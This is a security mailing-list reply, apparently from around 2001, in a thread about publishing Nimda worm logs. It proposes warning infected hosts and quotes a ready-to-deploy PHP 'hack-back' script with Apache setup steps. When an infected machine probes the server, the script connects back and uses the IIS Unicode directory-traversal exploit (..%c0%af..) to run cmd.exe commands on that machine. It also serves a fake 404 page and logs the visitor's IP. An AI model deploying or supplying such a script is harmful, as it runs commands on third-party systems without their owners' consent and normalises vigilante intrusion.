Re: Publishing Nimda Logs

[Jonathan Bloomquist <bocasolutions () yahoo com>]

--- "Deus, Attonbitus" <Thor () HammerofGod com> wrote:

-- snip --

>   1) Recommended. Go for it and publish the IP's and
> let the "Gods of IP"
>   sort out the damage.
>   2) A Bad Thing. These are innocent victims, and
> you will just have them be
>   attacked by evil people.
>   3) Boring. Who cares? It's Nimda, and an everyday
> part of life. Deal with
>   it and ignore the logs.
>
>   If "1," then I was thinking of going with a "Hall
> of Shame" and providing
>   ARIN look ups, contacts, and the whole bit. I
> could even allow other
>   people to post logs there and stuff like that...
>
>   Input appreciated.


How about another option (4. warn the infected) as
proposed in this slashdot post (text follows): 

http://slashdot.org/comments.pl?sid=21830&cid=2329699

I made a PHP script, by modifying a similar one used
for Code Red. First make a "scripts" directory in your
web server's root directory. Now put this into a file
called "root.exe" 

<?php 
/* Open a connection to the offender */ 
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5); 
                                /* Check to see if the
connection actually opened */ 
                                if ($fp) 
                                { 
                                                      
         /* URL-encode the message... */ 
                                                      
         $string = urlencode("net send %COMPUTERNAME%
WARNING: The NIMDA worm has been detected on your
computer. Please shut down the IIS web server that is
currently running and keep it disabled until you can
patch and/or re-install your system, or better yet,
upgrade to Linux or FreeBSD. Visit
http://www.kb.cert.org/vuls/id/111677 for more
information."); 
                                                      
         /* ...and send it */ 
                                                      
         fputs ($fp, "GET
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst
em32/cmd.exe?/c+$string HTTP/1.0\n\n"); 
                                                      
         /* close the connection (though it probably
got closed automatically) */ 
                                                      
         fclose ($fp); 
                                } 

/* for fun and confusion.. */ 
                                header ("HTTP/1.0
404"); 

                            echo ("<!DOCTYPE HTML
PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"); 
                                echo
("<html><head>\n<title>404 Not
Found</title>\n</head></body>\n" ); 
                                echo ("<h1>Not
Found</h1>\n"); 
                                echo ("The requested
URL $SCRIPT_NAME was not found on this server.\n"); 
                                echo
("</body></html>\n"); 
                                echo
("<address>Apache/1.3.20 Server at $SERVER_NAME Port
$SERVER_PORT</address>\n"); 
                                echo
("</body></html>\n"); 

$res = "dirty\r\n"; 
$log = fopen("/tmp/nimda.log", "a"); 
fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s
T") . " - " . $res); 
fclose($log); 
?> 

Then, (after making sure users can access the file..
try going to http://machine/scripts/root.exe. It's
going to print out the contents of that file. You want
to change that, right? 

Well here's how you change that. Edit your httpd.conf
file (/etc/httpd.conf, /usr/local/apache/httpd.conf,
whatever it is) and put this type in like this: 

AddType application/x-httpd-php .php .php3 .exe 

Now restart Apache by issuing one of either: 
/etc/rc.d/init.d/httpd restart 
apachectl restart 

That should do it, and you're going to have a logfile
of all the people who have been warned in
/tmp/nimba.log.



__________________________________________________
Do You Yahoo!?
Yahoo! Health - your guide to health and wellness
http://health.yahoo.com